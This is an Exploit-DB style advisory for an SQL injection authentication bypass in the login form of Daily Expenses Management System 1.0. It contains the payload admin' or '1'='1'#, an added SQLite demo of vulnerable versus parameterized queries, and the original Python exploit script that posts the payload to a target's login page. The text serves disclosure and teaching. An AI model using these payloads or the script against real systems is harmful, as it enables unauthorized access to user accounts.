Vendor: Daily Expenses Management System
By: Daniel Ortiz
CVSS: 8.8 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Daily Expenses Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:daily_expenses_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP Version 5.6.40 / Windows 10
2020

Daily Expenses Management System 1.0 – ‘username’ SQL Injection

Daily Expenses Management System 1.0 is vulnerable to SQL injection in its login form (the /dets/ index page). The login handler builds its SQL query by concatenating the submitted 'email' value (the field the Exploit-DB title calls 'username') directly into the statement, without parameterization or escaping, so the input is interpreted as part of the query rather than as data. An unauthenticated attacker can submit a crafted value such as admin' or '1'='1'# in the 'email' field: the or '1'='1' clause makes the WHERE condition true for every user row, and the trailing # (a MySQL line comment) discards the rest of the statement, including the password check. The query therefore returns a valid user record and the application establishes an authenticated session without the attacker knowing any credentials. No authentication or user interaction is required, which is reflected in the 8.8 (HIGH) CVSS score.

Mitigation:

Use parameterized queries (prepared statements with bound parameters, e.g. PDO or mysqli in PHP) so that user-supplied values are always passed to the database as data and are never parsed as SQL. Input validation is worthwhile as defence in depth (for example, rejecting an 'email' value that is not a syntactically valid address), but it is not a reliable fix on its own: blacklist-style filtering of quotes, comment markers or keywords is easy to bypass and easy to get wrong, whereas a parameterized query removes the injection point entirely. The same fix should be applied to every query in the application that incorporates request data, not only the login form.
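To make the bypass described above and the parameterized fix concrete, the following is an added example (it is not the page's own code and not taken from the Daily Expenses Management System source). It models the login check against a constructed in-memory SQLite table named users with email and password columns; the real application's schema and query text are not shown on the page, so those are assumptions. Because the advisory's payload ends with #, which is a MySQL comment marker, and SQLite only understands -- for line comments, the payload is rewritten with -- to reproduce the same effect; a second payload shows that the bypass works even without the comment, because OR binds more loosely than AND.

```python
import sqlite3

# Constructed test database standing in for the application's MySQL
# users table (assumed name and columns; not taken from the project).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)",
                 ("admin@example.com", "S3cret!"))
    conn.commit()
    return conn

def vulnerable_sql(email, password):
    """Builds the statement the way the vulnerable login does: by string
    concatenation, so the request data becomes part of the SQL grammar."""
    return ("SELECT id FROM users WHERE email = '%s' AND password = '%s'"
            % (email, password))

def login_vulnerable(conn, email, password):
    """Returns the matched user id, or None. Any quote in the input
    terminates the string literal and the remainder is executed as SQL."""
    row = conn.execute(vulnerable_sql(email, password)).fetchone()
    return row[0] if row else None

def login_fixed(conn, email, password):
    """Parameterized version: '?' placeholders are bound by the driver,
    so the same payload is compared as an opaque string and matches nothing."""
    row = conn.execute(
        "SELECT id FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None

# Exploit-DB payload, with MySQL's '#' comment replaced by SQLite's '-- '.
# Resulting WHERE clause:  email = 'admin' or '1'='1' -- ' AND password = '...'
PAYLOAD_COMMENT = "admin' or '1'='1' -- "

# Same idea without a comment marker. Precedence makes this
#   email = 'admin@example.com' OR ('1'='1' AND password = 'wrong')
# which is true for the admin row regardless of the password supplied.
PAYLOAD_NO_COMMENT = "admin@example.com' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    for payload in (PAYLOAD_COMMENT, PAYLOAD_NO_COMMENT):
        print("query     :", vulnerable_sql(payload, "wrong"))
        print("vulnerable:", login_vulnerable(db, payload, "wrong"))
        print("fixed     :", login_fixed(db, payload, "wrong"))
```

Both payloads log in as user id 1 through login_vulnerable with a wrong password, while login_fixed returns None for them and only admits the real email and password pair. The printed query strings show exactly where the attacker's quote closes the literal, which is the quickest way to explain the bug to a developer.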

Exploit-DB raw data:

# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html

import sys
import requests
import urllib3
import re


urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def make_request(url, payload):
    # Traffic is routed through Burp's default listener on 127.0.0.1:8080 so
    # the injected request can be inspected; set p = None to send directly.
    p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
    s = requests.Session()
    r = s.post(url, data=payload, proxies=p)
    return r

if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s  TARGET" % sys.argv[0])
        print("[*] e.g: %s  192.168.0.10" % sys.argv[0])
        sys.exit(-1)

    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET


    # Step 1 - Bypass login form
    # The injection is in the 'email' field: "or '1'='1'" matches every user
    # row and the trailing '#' comments out the password check in the query.

    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}
    print("[+] Endpoint: %s" % LOGIN_FORM)
    print("[+] Making requests with payload: %s" % p1)
    r = make_request(url, p1)

    # A successful bypass lands on the authenticated 'Dashboard' page
    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
    else:
        print("[-] Error !!!")